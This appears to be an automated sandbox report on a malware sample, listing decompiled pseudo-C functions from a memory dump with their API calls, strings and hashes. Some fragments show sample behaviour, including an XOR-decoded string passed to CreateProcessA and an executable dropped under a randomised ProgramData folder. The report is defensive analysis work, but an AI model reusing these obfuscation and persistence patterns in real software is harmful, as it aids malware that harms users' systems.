					_t64 = _t64 + 1;
				} while (_t35 != 0);
				_t52 = _t61 >> 2;
				memcpy(_t64, _t71, _t52 << 2);
				_t55 = _t61 & 0x00000003;
				_t38 = memcpy(_t71 + _t52 + _t52, _t71, _t61 & 0x00000003);
				_t72 = 0x44;
				E00B4D0F0(_t71 + (_t61 & 0x00000003) + _t55, _t38, 0, _t72);
				asm("movaps xmm0, [0xb3dc80]");
				_v132.cb = _t72;
				asm("stosd");
				_v132.lpDesktop = 0xb699c0;
				asm("movups [ebp-0x20], xmm0");
				_v20 = 0x2b377c70;
				_t57 = 0;
				asm("stosd");
				_v16 = 0x31303a20;
				_v12 = 0;
				asm("stosd");
				asm("stosd");
				do {
					_t19 = _t57 + 0x40; // 0x40
					 *(_t73 + _t57 - 0x20) =  *(_t73 + _t57 - 0x20) ^ _t19;
					_t57 =  &(_t57->nLength);
				} while (_t57 < 0x18);
				_v12 = 0;
				CreateProcessA(_t48,  &_v36, 0, 0, 0, 0, 0, 0,  &_v132,  &_v56);
				return E00B4AE43(_v8 ^ _t73);
			}

APIs

SHGetFolderPathA.SHELL32(00000000,00000026,00000000,00000000,00000000), ref: 00B456FA
CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00B457B8

Strings

Tett, xrefs: 00B45774
p|7+, xrefs: 00B4577F
:01, xrefs: 00B45789

Memory Dump Source

Source File: 00000021.00000002.457737013.0000000000B31000.00000020.00020000.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000021.00000002.457727689.0000000000B30000.00000002.00020000.sdmp Download File
Associated: 00000021.00000002.457780329.0000000000B67000.00000002.00020000.sdmp Download File
Associated: 00000021.00000002.457793668.0000000000B69000.00000004.00020000.sdmp Download File
Associated: 00000021.00000002.457820393.0000000000B6C000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateFolderPathProcess
String ID: :01$Tett$p|7+
API String ID: 3403665443-2609737526
Opcode ID: 5a07eb189b34f29191b960c5d1391ceda5c48ba5448137298354698acc8e2108
Instruction ID: 041c136af8fb1986efddb326fe731d10abfbb5da810e3f50a5309a694ff72957
Opcode Fuzzy Hash: 5a07eb189b34f29191b960c5d1391ceda5c48ba5448137298354698acc8e2108
Instruction Fuzzy Hash: F4312570904648AAEF04DBBCDC44AFEBBF9FF48304F1041A8E941A7152EB745A49C760

Uniqueness

Uniqueness Score: -1.00%

Function 00B59FBE, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 83
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00B59FBE(intOrPtr* _a4, intOrPtr _a8, intOrPtr _a16) {
				void* _t14;
				void* _t15;
				intOrPtr _t17;
				intOrPtr _t36;
				intOrPtr* _t38;
				intOrPtr _t39;

				_t38 = _a4;
				if(_t38 != 0) {
					if( *_t38 != 0) {
						_t14 = E00B5A975(_a16, 0, _t38, 0xffffffff, 0, 0, 0, 0);
						if(_t14 != 0) {
							_t36 = _a8;
							if(_t14 <=  *((intOrPtr*)(_t36 + 0xc))) {
								L10:
								_t15 = E00B5A975(_a16, 0, _t38, 0xffffffff,  *((intOrPtr*)(_t36 + 8)),  *((intOrPtr*)(_t36 + 0xc)), 0, 0);
								if(_t15 != 0) {
									 *((intOrPtr*)(_t36 + 0x10)) = _t15 - 1;
									_t17 = 0;
								} else {
									E00B55B87(GetLastError());
									_t17 =  *((intOrPtr*)(E00B55BBD()));
								}
								L13:
								L14:
								return _t17;
							}
							_t17 = E00B55FB4(_t36, _t14);
							if(_t17 != 0) {
								goto L13;
							}
							goto L10;
						}
						E00B55B87(GetLastError());
						_t17 =  *((intOrPtr*)(E00B55BBD()));
						goto L14;
					}
					_t39 = _a8;
					if( *((intOrPtr*)(_t39 + 0xc)) != 0) {
						L5:
						 *((char*)( *((intOrPtr*)(_t39 + 8)))) = 0;
						_t17 = 0;
						 *((intOrPtr*)(_t39 + 0x10)) = 0;
						goto L14;
					}
					_t17 = E00B55FB4(_t39, 1);
					if(_t17 != 0) {
						goto L14;
					}
					goto L5;
				}
				E00B56039(_a8);
				return 0;
			}

Strings

C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}\AIKY.exe, xrefs: 00B59FC3

Memory Dump Source

Source File: 00000021.00000002.457737013.0000000000B31000.00000020.00020000.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000021.00000002.457727689.0000000000B30000.00000002.00020000.sdmp Download File
Associated: 00000021.00000002.457780329.0000000000B67000.00000002.00020000.sdmp Download File
Associated: 00000021.00000002.457793668.0000000000B69000.00000004.00020000.sdmp Download File
Associated: 00000021.00000002.457820393.0000000000B6C000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}\AIKY.exe
API String ID: 0-1411296268
Opcode ID: 9fa23cb303b63ec6440e236c8a0c9277ce9424cc354b06120b88a10713c45e1e
Instruction ID: eac2f34b0333dc9acd97aa90372cbec852887abcb731fc5c1a9a3d4f0b0d0262
Opcode Fuzzy Hash: 9fa23cb303b63ec6440e236c8a0c9277ce9424cc354b06120b88a10713c45e1e
Instruction Fuzzy Hash: F121B071604606BFDB60AF608C80F6AB7DCEE013AB71447D4FD64A7181EB31EC488BA1

Uniqueness

Uniqueness Score: -1.00%

Function 00B5830D, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 72
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E00B5830D(void* __ecx, void* __edx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t2;
				long _t3;
				intOrPtr _t5;
				long _t6;
				intOrPtr _t9;
				long _t10;
				signed int _t39;
				signed int _t40;
				void* _t43;
				void* _t49;
				signed int _t51;
				signed int _t53;
				signed int _t54;
				long _t56;
				long _t60;
				long _t61;
				void* _t65;

				_t49 = __edx;
				_t43 = __ecx;
				_t60 = GetLastError();
				_t2 =  *0xb69310; // 0x7
				_t67 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L6:
					_t3 = E00B5DBB7(__eflags, _t2, 0xffffffff);
					__eflags = _t3;
					if(_t3 == 0) {
						goto L3;
					} else {
						_t51 = E00B598AF(1, 0x364);
						_pop(_t43);
						__eflags = _t51;
						if(__eflags != 0) {
							__eflags = E00B5DBB7(__eflags,  *0xb69310, _t51);
							if(__eflags != 0) {
								E00B58137(_t60, _t51, 0xb6a8cc);
								E00B564B8(0);
								_t65 = _t65 + 0xc;
								goto L13;
							} else {
								_t39 = 0;
								E00B5DBB7(__eflags,  *0xb69310, 0);
								_push(_t51);
								goto L9;
							}
						} else {
							_t39 = 0;
							__eflags = 0;
							E00B5DBB7(0,  *0xb69310, 0);
							_push(0);
							L9:
							E00B564B8();
							_pop(_t43);
							goto L4;
						}
					}
				} else {
					_t51 = E00B5DB78(_t67, _t2);
					if(_t51 == 0) {
						_t2 =  *0xb69310; // 0x7
						goto L6;
					} else {
						if(_t51 != 0xffffffff) {
							L13:
							_t39 = _t51;
						} else {
							L3:
							_t39 = 0;
							L4:
							_t51 = _t39;
						}
					}
				}
				SetLastError(_t60);
				asm("sbb edi, edi");
				_t53 =  ~_t51 & _t39;
				if(_t53 == 0) {
					E00B55E69(_t39, _t43, _t49, _t53, _t60);
					asm("int3");
					_t5 =  *0xb69310; // 0x7
					_push(_t60);
					__eflags = _t5 - 0xffffffff;
					if(__eflags == 0) {
						L22:
						_t6 = E00B5DBB7(__eflags, _t5, 0xffffffff);
						__eflags = _t6;
						if(_t6 == 0) {
							goto L31;
						} else {
							_t60 = E00B598AF(1, 0x364);
							_pop(_t43);
							__eflags = _t60;
							if(__eflags != 0) {
								__eflags = E00B5DBB7(__eflags,  *0xb69310, _t60);
								if(__eflags != 0) {
									E00B58137(_t60, _t60, 0xb6a8cc);
									E00B564B8(0);
									_t65 = _t65 + 0xc;
									goto L29;
								} else {
									E00B5DBB7(__eflags,  *0xb69310, _t21);
									_push(_t60);
									goto L25;
								}
							} else {
								E00B5DBB7(__eflags,  *0xb69310, _t20);
								_push(_t60);
								L25:
								E00B564B8();
								_pop(_t43);
								goto L31;
							}
						}
					} else {
						_t60 = E00B5DB78(__eflags, _t5);
						__eflags = _t60;
						if(__eflags == 0) {
							_t5 =  *0xb69310; // 0x7
							goto L22;
						} else {
							__eflags = _t60 - 0xffffffff;
							if(_t60 == 0xffffffff) {
								L31:
								E00B55E69(_t39, _t43, _t49, _t53, _t60);
								asm("int3");
								_push(_t39);
								_push(_t60);
								_push(_t53);
								_t61 = GetLastError();
								_t9 =  *0xb69310; // 0x7
								__eflags = _t9 - 0xffffffff;
								if(__eflags == 0) {
									L38:
									_t10 = E00B5DBB7(__eflags, _t9, 0xffffffff);
									__eflags = _t10;
									if(_t10 == 0) {
										goto L35;
									} else {
										_t54 = E00B598AF(1, 0x364);
										__eflags = _t54;
										if(__eflags != 0) {
											__eflags = E00B5DBB7(__eflags,  *0xb69310, _t54);
											if(__eflags != 0) {
												E00B58137(_t61, _t54, 0xb6a8cc);
												E00B564B8(0);
												goto L45;
											} else {
												_t40 = 0;
												E00B5DBB7(__eflags,  *0xb69310, 0);
												_push(_t54);
												goto L41;
											}
										} else {
											_t40 = 0;
											__eflags = 0;
											E00B5DBB7(0,  *0xb69310, 0);
											_push(0);
											L41:
											E00B564B8();
											goto L36;
										}
									}
								} else {
									_t54 = E00B5DB78(__eflags, _t9);
									__eflags = _t54;
									if(__eflags == 0) {
										_t9 =  *0xb69310; // 0x7
										goto L38;
									} else {
										__eflags = _t54 - 0xffffffff;
										if(_t54 != 0xffffffff) {
											L45:
											_t40 = _t54;
										} else {
											L35:
											_t40 = 0;
											__eflags = 0;
											L36:
											_t54 = _t40;
										}
									}
								}
								SetLastError(_t61);
								asm("sbb edi, edi");
								_t56 =  ~_t54 & _t40;
								__eflags = _t56;
								return _t56;
							} else {
								L29:
								__eflags = _t60;
								if(_t60 == 0) {
									goto L31;
								} else {
									return _t60;
								}
							}
						}
					}
				} else {
					return _t53;
				}
			}

APIs

GetLastError.KERNEL32(80(,$,00000000,00000000,00B52F3C,?,00B4AB3B,80(,$,00B3DA3C,00000000,?,?,00B49006,00000000,00B3DA3C,00B3DA3C), ref: 00B58312
_free.LIBCMT ref: 00B5836F
_free.LIBCMT ref: 00B583A5
SetLastError.KERNEL32(00000000,00000007,000000FF,?,00B4AB3B,80(,$,00B3DA3C,00000000,?,?,00B49006,00000000,00B3DA3C,00B3DA3C), ref: 00B583B0

Strings

80(,$, xrefs: 00B58311

Memory Dump Source

Source File: 00000021.00000002.457737013.0000000000B31000.00000020.00020000.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000021.00000002.457727689.0000000000B30000.00000002.00020000.sdmp Download File
Associated: 00000021.00000002.457780329.0000000000B67000.00000002.00020000.sdmp Download File
Associated: 00000021.00000002.457793668.0000000000B69000.00000004.00020000.sdmp Download File
Associated: 00000021.00000002.457820393.0000000000B6C000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast_free
String ID: 80(,$
API String ID: 2283115069-2486461660
Opcode ID: a6eb2e6d327a44fae2edfab850eeb4a89f580859ebd6c13a9b3ab032e72e8809
Instruction ID: 30ec472c3039161c2d1a552b2a7a444a1e76dfdf5bd13839a6da82a69f9d7939
Opcode Fuzzy Hash: a6eb2e6d327a44fae2edfab850eeb4a89f580859ebd6c13a9b3ab032e72e8809
Instruction Fuzzy Hash: AB1186322046016BDA1137759C85F3A36EADBC1BB7B2507E4FE24A72F1DEB58C1D8124

Uniqueness

Uniqueness Score: -1.00%

Function 00B52E5E, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 31
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 25%

			E00B52E5E(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				_Unknown_base(*)()* _t8;
				_Unknown_base(*)()* _t14;

				_v8 = _v8 & 0x00000000;
				_t8 =  &_v8;
				__imp__GetModuleHandleExW(0, L"mscoree.dll", _t8, __ecx);
				if(_t8 != 0) {
					_t8 = GetProcAddress(_v8, "CorExitProcess");
					_t14 = _t8;
					if(_t14 != 0) {
						 *0xb672b4(_a4);
						_t8 =  *_t14();
					}
				}
				if(_v8 != 0) {
					return FreeLibrary(_v8);
				}
				return _t8;
			}

0x00b52e64
0x00b52e68
0x00b52e73
0x00b52e7b
0x00b52e86
0x00b52e8c
0x00b52e90
0x00b52e97
0x00b52e9d
0x00b52e9d
0x00b52e9f
0x00b52ea4
0x00000000
0x00b52ea9
0x00b52eb2

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,00B52E53,00B3DA3C,?,00B52E1B,242C2830,00000038,00B3DA3C), ref: 00B52E73
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00B52E86
FreeLibrary.KERNEL32(00000000,?,?,00B52E53,00B3DA3C,?,00B52E1B,242C2830,00000038,00B3DA3C), ref: 00B52EA9

Strings

CorExitProcess, xrefs: 00B52E7E
mscoree.dll, xrefs: 00B52E6C

Memory Dump Source

Source File: 00000021.00000002.457737013.0000000000B31000.00000020.00020000.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000021.00000002.457727689.0000000000B30000.00000002.00020000.sdmp Download File
Associated: 00000021.00000002.457780329.0000000000B67000.00000002.00020000.sdmp Download File
Associated: 00000021.00000002.457793668.0000000000B69000.00000004.00020000.sdmp Download File
Associated: 00000021.00000002.457820393.0000000000B6C000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 78f707cc016627b7912b1cdba18480d3c8d26b1e32b738c3330b4ad1e18b6eed
Instruction ID: a9c530a47468518eef862f6c196ff88e2cfc018837a547315fd122e37d9a7966
Opcode Fuzzy Hash: 78f707cc016627b7912b1cdba18480d3c8d26b1e32b738c3330b4ad1e18b6eed
Instruction Fuzzy Hash: 85F08231546218FBDB119B91DE0EB9EBBA8EB42716F1000E5FC04A21A0CFB55E00DA90

Uniqueness

Uniqueness Score: -1.00%

Function 00B542A7, Relevance: 7.7, APIs: 5, Instructions: 188
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E00B542A7(void* __ebx, signed int __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
				intOrPtr* _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr* _v20;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				signed int _v60;
				char _v276;
				short _v278;
				short _v280;
				char _v448;
				signed int _v452;
				short _v454;
				intOrPtr _v456;
				signed int _v460;
				intOrPtr _v464;
				signed int _v468;
				signed int _v472;
				intOrPtr _v512;
				char _v536;
				intOrPtr _v540;
				signed int _v544;
				intOrPtr _v548;
				signed int _v560;
				char _v708;
				signed int _v712;
				short _v714;
				signed int* _v716;
				signed int _v720;
				signed int _v724;
				signed int _v728;
				signed int* _v732;
				intOrPtr _v736;
				signed int _v740;
				signed int _v744;
				signed int _v748;
				signed int _v752;
				char _v824;
				char _v1252;
				char _v1264;
				intOrPtr _v1276;
				signed int _v1288;
				signed int _t240;
				void* _t243;
				signed int _t246;
				signed int _t248;
				signed int _t254;
				signed int _t255;
				signed int _t256;
				signed int _t257;
				signed int _t258;
				signed int _t260;
				signed int _t262;
				void* _t264;
				signed int _t265;
				signed int _t266;
				signed int _t267;
				signed int _t269;
				signed int _t272;
				signed int _t279;
				signed int _t282;
				signed int _t283;
				intOrPtr _t284;
				signed int _t287;
				signed int _t289;
				signed int _t290;
				intOrPtr _t292;
				signed int _t295;
				signed int _t296;
				signed int _t298;
				signed int _t318;
				signed int _t320;
				signed int _t322;
				signed int _t327;
				void* _t329;
				signed int _t331;
				void* _t332;
				intOrPtr _t333;
				signed int _t338;
				signed int _t339;
				intOrPtr* _t344;
				signed int _t358;
				signed int _t360;
				signed int _t362;
				intOrPtr* _t363;
				signed int _t365;
				intOrPtr* _t375;
				intOrPtr* _t378;
				void* _t381;
				signed int _t382;
				intOrPtr* _t385;
				intOrPtr* _t386;
				signed int _t395;
				intOrPtr _t398;
				intOrPtr* _t399;
				signed int _t401;
				signed int* _t405;
				signed int _t406;
				intOrPtr* _t412;
				intOrPtr* _t413;
				signed int _t421;
				signed int _t422;
				short _t423;
				void* _t424;
				void* _t426;
				signed int _t427;
				signed int _t429;
				intOrPtr _t430;
				signed int _t433;
				intOrPtr _t434;
				signed int _t436;
				signed int _t439;
				intOrPtr _t445;
				signed int _t446;
				signed int _t448;
				signed int _t449;
				signed int _t453;
				signed int _t455;
				signed int _t458;
				signed int* _t459;
				intOrPtr* _t460;
				short _t461;
				void* _t463;
				signed int _t465;
				signed int _t467;
				void* _t469;
				void* _t470;
				void* _t472;
				signed int _t473;
				void* _t474;
				void* _t476;
				signed int _t477;
				void* _t479;
				void* _t481;
				signed int _t493;

				_t421 = __edx;
				_t463 = _t469;
				_t470 = _t469 - 0x10;
				_push(__ebx);
				_push(__esi);
				_v12 = 1;
				_t358 = E00B56F1C(0x6a6);
				_t239 = 0;
				if(_t358 == 0) {
					L20:
					return _t239;
				} else {
					_push(__edi);
					_t2 = _t358 + 4; // 0x4
					_t429 = _t2;
					 *_t429 = 0;
					 *_t358 = 1;
					_t445 = _a4;
					_t240 = _t445 + 0x30;
					_push( *_t240);
					_v16 = _t240;
					_push(0xb34e28);
					_push( *0xb34d64);
					E00B541E1(_t358, _t429, _t445, _t429, 0x351, 3);
					_t472 = _t470 + 0x18;
					_v8 = 0xb34d64;
					while(1) {
						L2:
						_t243 = E00B59764(_t429, 0x351, 0xb34e24);
						_t473 = _t472 + 0xc;
						if(_t243 != 0) {
							break;
						} else {
							_t8 = _v16 + 0x10; // 0x10
							_t412 = _t8;
							_t338 =  *_v16;
							_v16 = _t412;
							_t413 =  *_t412;
							_v20 = _t413;
							goto L4;
						}
						while(1) {
							L4:
							_t421 =  *_t338;
							if(_t421 !=  *_t413) {
								break;
							}
							if(_t421 == 0) {
								L8:
								_t339 = 0;
							} else {
								_t421 =  *((intOrPtr*)(_t338 + 2));
								if(_t421 !=  *((intOrPtr*)(_t413 + 2))) {
									break;
								} else {
									_t338 = _t338 + 4;
									_t413 = _t413 + 4;
									if(_t421 != 0) {
										continue;
									} else {
										goto L8;
									}
								}
							}
							L10:
							_push(_v20);
							_push(0xb34e28);
							asm("sbb eax, eax");
							_v12 = _v12 &  !( ~_t339);
							_t344 = _v8 + 0xc;
							_v8 = _t344;
							_push( *_t344);
							E00B541E1(_t358, _t429, _t445, _t429, 0x351, 3);
							_t472 = _t473 + 0x18;
							if(_v8 < 0xb34d94) {
								goto L2;
							} else {
								if(_v12 != 0) {
									E00B564B8(_t358);
									_t436 = _t429 | 0xffffffff;
									__eflags =  *(_t445 + 0x28);
									if(__eflags != 0) {
										asm("lock xadd [ecx], eax");
										if(__eflags == 0) {
											E00B564B8( *(_t445 + 0x28));
										}
									}
									__eflags =  *(_t445 + 0x24);
									if( *(_t445 + 0x24) != 0) {
										asm("lock xadd [eax], edi");
										__eflags = _t436 == 1;
										if(_t436 == 1) {
											E00B564B8( *(_t445 + 0x24));
										}
									}
									 *(_t445 + 0x24) = 0;
									 *(_t445 + 0x1c) = 0;
									 *(_t445 + 0x28) = 0;
									 *((intOrPtr*)(_t445 + 0x20)) = 0;
									_t239 =  *((intOrPtr*)(_t445 + 0x40));
								} else {
									_t439 = _t429 | 0xffffffff;
									_t493 =  *(_t445 + 0x28);
									if(_t493 != 0) {
										asm("lock xadd [ecx], eax");
										if(_t493 == 0) {
											E00B564B8( *(_t445 + 0x28));
										}
									}
									if( *(_t445 + 0x24) != 0) {
										asm("lock xadd [eax], edi");
										if(_t439 == 1) {
											E00B564B8( *(_t445 + 0x24));
										}
									}
									 *(_t445 + 0x24) =  *(_t445 + 0x24) & 0x00000000;
									_t28 = _t358 + 4; // 0x4
									_t239 = _t28;
									 *(_t445 + 0x1c) =  *(_t445 + 0x1c) & 0x00000000;
									 *(_t445 + 0x28) = _t358;
									 *((intOrPtr*)(_t445 + 0x20)) = _t239;
								}
								goto L20;
							}
							goto L131;
						}
						asm("sbb eax, eax");
						_t339 = _t338 | 0x00000001;
						__eflags = _t339;
						goto L10;
					}
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					E00B52919();
					asm("int3");
					_push(_t463);
					_t465 = _t473;
					_t474 = _t473 - 0x1d0;
					_t246 =  *0xb69014; // 0xce6f0fb5
					_v60 = _t246 ^ _t465;
					_t248 = _v44;
					_push(_t358);
					_push(_t445);
					_t446 = _v40;
					_push(_t429);
					_t430 = _v48;
					_v512 = _t430;
					__eflags = _t248;
					if(_t248 == 0) {
						_v460 = 1;
						_v468 = 0;
						_t360 = 0;
						_v452 = 0;
						__eflags = _t446;
						if(__eflags == 0) {
							L79:
							E00B542A7(_t360, _t421, _t430, _t446, __eflags, _t430);
							goto L80;
						} else {
							__eflags =  *_t446 - 0x4c;
							if( *_t446 != 0x4c) {
								L59:
								_t254 = E00B53E03(_t360, _t430, _t446, _t446,  &_v276, 0x83,  &_v448, 0x55, 0);
								_t476 = _t474 + 0x18;
								__eflags = _t254;
								if(_t254 != 0) {
									__eflags = 0;
									_t422 = _t430 + 0x20;
									_t448 = 0;
									_v452 = _t422;
									do {
										__eflags = _t448;
										if(_t448 == 0) {
											L74:
											_t255 = _v460;
										} else {
											_t375 =  *_t422;
											_t256 =  &_v276;
											while(1) {
												__eflags =  *_t256 -  *_t375;
												_t430 = _v464;
												if( *_t256 !=  *_t375) {
													break;
												}
												__eflags =  *_t256;
												if( *_t256 == 0) {
													L67:
													_t257 = 0;
												} else {
													_t423 =  *((intOrPtr*)(_t256 + 2));
													__eflags = _t423 -  *((intOrPtr*)(_t375 + 2));
													_v454 = _t423;
													_t422 = _v452;
													if(_t423 !=  *((intOrPtr*)(_t375 + 2))) {
														break;
													} else {
														_t256 = _t256 + 4;
														_t375 = _t375 + 4;
														__eflags = _v454;
														if(_v454 != 0) {
															continue;
														} else {
															goto L67;
														}
													}
												}
												L69:
												__eflags = _t257;
												if(_t257 == 0) {
													_t360 = _t360 + 1;
													__eflags = _t360;
													goto L74;
												} else {
													_t258 =  &_v276;
													_push(_t258);
													_push(_t448);
													_push(_t430);
													L83();
													_t422 = _v452;
													_t476 = _t476 + 0xc;
													__eflags = _t258;
													if(_t258 == 0) {
														_t255 = 0;
														_v460 = 0;
													} else {
														_t360 = _t360 + 1;
														goto L74;
													}
												}
												goto L75;
											}
											asm("sbb eax, eax");
											_t257 = _t256 | 0x00000001;
											__eflags = 0;
											goto L69;
										}
										L75:
										_t448 = _t448 + 1;
										_t422 = _t422 + 0x10;
										_v452 = _t422;
										__eflags = _t448 - 5;
									} while (_t448 <= 5);
									__eflags = _t255;
									if(__eflags != 0) {
										goto L79;
									} else {
										__eflags = _t360;
										if(__eflags != 0) {
											goto L79;
										} else {
										}
									}
								}
								goto L80;
							} else {
								__eflags =  *(_t446 + 2) - 0x43;
								if( *(_t446 + 2) != 0x43) {
									goto L59;
								} else {
									__eflags =  *((short*)(_t446 + 4)) - 0x5f;
									if( *((short*)(_t446 + 4)) != 0x5f) {
										goto L59;
									} else {
										while(1) {
											_t260 = E00B5BE10(_t446, 0xb34e1c);
											_t362 = _t260;
											_v472 = _t362;
											_pop(_t377);
											__eflags = _t362;
											if(_t362 == 0) {
												break;
											}
											_t262 = _t260 - _t446;
											__eflags = _t262;
											_v460 = _t262 >> 1;
											if(_t262 == 0) {
												break;
											} else {
												_t264 = 0x3b;
												__eflags =  *_t362 - _t264;
												if( *_t362 == _t264) {
													break;
												} else {
													_t433 = _v460;
													_t363 = 0xb34d64;
													_v456 = 1;
													do {
														_t265 = E00B563DD( *_t363, _t446, _t433);
														_t474 = _t474 + 0xc;
														__eflags = _t265;
														if(_t265 != 0) {
															goto L45;
														} else {
															_t378 =  *_t363;
															_t424 = _t378 + 2;
															do {
																_t333 =  *_t378;
																_t378 = _t378 + 2;
																__eflags = _t333 - _v468;
															} while (_t333 != _v468);
															_t377 = _t378 - _t424 >> 1;
															__eflags = _t433 - _t378 - _t424 >> 1;
															if(_t433 != _t378 - _t424 >> 1) {
																goto L45;
															}
														}
														break;
														L45:
														_v456 = _v456 + 1;
														_t363 = _t363 + 0xc;
														__eflags = _t363 - 0xb34d94;
													} while (_t363 <= 0xb34d94);
													_t360 = _v472 + 2;
													_t266 = E00B5BDB5(_t377, _t360, 0xb34e24);
													_t430 = _v464;
													_t449 = _t266;
													_pop(_t381);
													__eflags = _t449;
													if(_t449 != 0) {
														L48:
														__eflags = _v456 - 5;
														if(_v456 > 5) {
															_t382 = _v452;
															goto L54;
														} else {
															_push(_t449);
															_t269 = E00B598A4( &_v276, 0x83, _t360);
															_t477 = _t474 + 0x10;
															__eflags = _t269;
															if(_t269 != 0) {
																L82:
																_push(0);
																_push(0);
																_push(0);
																_push(0);
																_push(0);
																E00B52919();
																asm("int3");
																_push(_t465);
																_t467 = _t477;
																_t272 =  *0xb69014; // 0xce6f0fb5
																_v560 = _t272 ^ _t467;
																_push(_t360);
																_t365 = _v544;
																_push(_t449);
																_push(_t430);
																_t434 = _v548;
																_v1288 = _t365;
																_v1276 = E00B5830D(_t381, _t421) + 0x278;
																_t279 = E00B53E03(_t365, _t434, _v540, _v540,  &_v824, 0x83,  &_v1252, 0x55,  &_v1264);
																_t479 = _t477 - 0x2e4 + 0x18;
																__eflags = _t279;
																if(_t279 == 0) {
																	L122:
																	__eflags = 0;
																	goto L123;
																} else {
																	_t102 = _t365 + 2; // 0x6
																	_t453 = _t102 << 4;
																	__eflags = _t453;
																	_t282 =  &_v280;
																	_v724 = _t453;
																	_t385 =  *((intOrPtr*)(_t453 + _t434));
																	while(1) {
																		_v712 = _v712 & 0x00000000;
																		__eflags =  *_t282 -  *_t385;
																		_t455 = _v724;
																		if( *_t282 !=  *_t385) {
																			break;
																		}
																		__eflags =  *_t282;
																		if( *_t282 == 0) {
																			L89:
																			_t283 = _v712;
																		} else {
																			_t461 =  *((intOrPtr*)(_t282 + 2));
																			__eflags = _t461 -  *((intOrPtr*)(_t385 + 2));
																			_v714 = _t461;
																			_t455 = _v724;
																			if(_t461 !=  *((intOrPtr*)(_t385 + 2))) {
																				break;
																			} else {
																				_t282 = _t282 + 4;
																				_t385 = _t385 + 4;
																				__eflags = _v714;
																				if(_v714 != 0) {
																					continue;
																				} else {
																					goto L89;
																				}
																			}
																		}
																		L91:
																		__eflags = _t283;
																		if(_t283 != 0) {
																			_t386 =  &_v280;
																			_t426 = _t386 + 2;
																			do {
																				_t284 =  *_t386;
																				_t386 = _t386 + 2;
																				__eflags = _t284 - _v712;
																			} while (_t284 != _v712);
																			_v728 = (_t386 - _t426 >> 1) + 1;
																			_t287 = E00B56F1C(4 + ((_t386 - _t426 >> 1) + 1) * 2);
																			_v740 = _t287;
																			__eflags = _t287;
																			if(_t287 == 0) {
																				goto L122;
																			} else {
																				_v736 =  *((intOrPtr*)(_t455 + _t434));
																				_v748 =  *(_t434 + 0xa0 + _t365 * 4);
																				_v752 =  *(_t434 + 8);
																				_v716 = _t287 + 4;
																				_t289 = E00B5604D(_t287 + 4, _v728,  &_v280);
																				_t481 = _t479 + 0xc;
																				__eflags = _t289;
																				if(_t289 != 0) {
																					_t290 = _v712;
																					_push(_t290);
																					_push(_t290);
																					_push(_t290);
																					_push(_t290);
																					_push(_t290);
																					E00B52919();
																					asm("int3");
																					_t292 =  *0xb6a53c; // 0x0
																					return _t292;
																				} else {
																					__eflags = _v280 - 0x43;
																					 *((intOrPtr*)(_t455 + _t434)) = _v716;
																					if(_v280 != 0x43) {
																						L100:
																						_t295 = E00B53B10(_t365, _t434,  &_v708);
																						_t395 = _v712;
																					} else {
																						__eflags = _v278;
																						if(_v278 != 0) {
																							goto L100;
																						} else {
																							_t395 = _v712;
																							_t295 = _t395;
																						}
																					}
																					 *(_t434 + 0xa0 + _t365 * 4) = _t295;
																					__eflags = _t365 - 2;
																					if(_t365 != 2) {
																						__eflags = _t365 - 1;
																						if(_t365 != 1) {
																							__eflags = _t365 - 5;
																							if(_t365 == 5) {
																								 *((intOrPtr*)(_t434 + 0x14)) = _v720;
																							}
																						} else {
																							 *((intOrPtr*)(_t434 + 0x10)) = _v720;
																						}
																					} else {
																						_t459 = _v732;
																						_t427 = _t395;
																						_t405 = _t459;
																						 *(_t434 + 8) = _v720;
																						_v716 = _t459;
																						_v728 = _t459[8];
																						_v720 = _t459[9];
																						while(1) {
																							__eflags =  *(_t434 + 8) -  *_t405;
																							if( *(_t434 + 8) ==  *_t405) {
																								break;
																							}
																							_t460 = _v716;
																							_t427 = _t427 + 1;
																							_t327 =  *_t405;
																							 *_t460 = _v728;
																							_v720 = _t405[1];
																							_t405 = _t460 + 8;
																							 *((intOrPtr*)(_t460 + 4)) = _v720;
																							_t365 = _v744;
																							_t459 = _v732;
																							_v728 = _t327;
																							_v716 = _t405;
																							__eflags = _t427 - 5;
																							if(_t427 < 5) {
																								continue;
																							} else {
																							}
																							L108:
																							__eflags = _t427 - 5;
																							if(__eflags == 0) {
																								_t318 = E00B5BFC9(_t365, _t434, _t459, __eflags, _v712, 1, 0xb34cd8, 0x7f,  &_v536,  *(_t434 + 8), 1);
																								_t481 = _t481 + 0x1c;
																								__eflags = _t318;
																								if(_t318 == 0) {
																									_t406 = _v712;
																								} else {
																									_t320 = _v712;
																									do {
																										 *(_t467 + _t320 * 2 - 0x20c) =  *(_t467 + _t320 * 2 - 0x20c) & 0x000001ff;
																										_t320 = _t320 + 1;
																										__eflags = _t320 - 0x7f;
																									} while (_t320 < 0x7f);
																									_t322 = E00B4E36D( &_v536,  *0xb690a0, 0xfe);
																									_t481 = _t481 + 0xc;
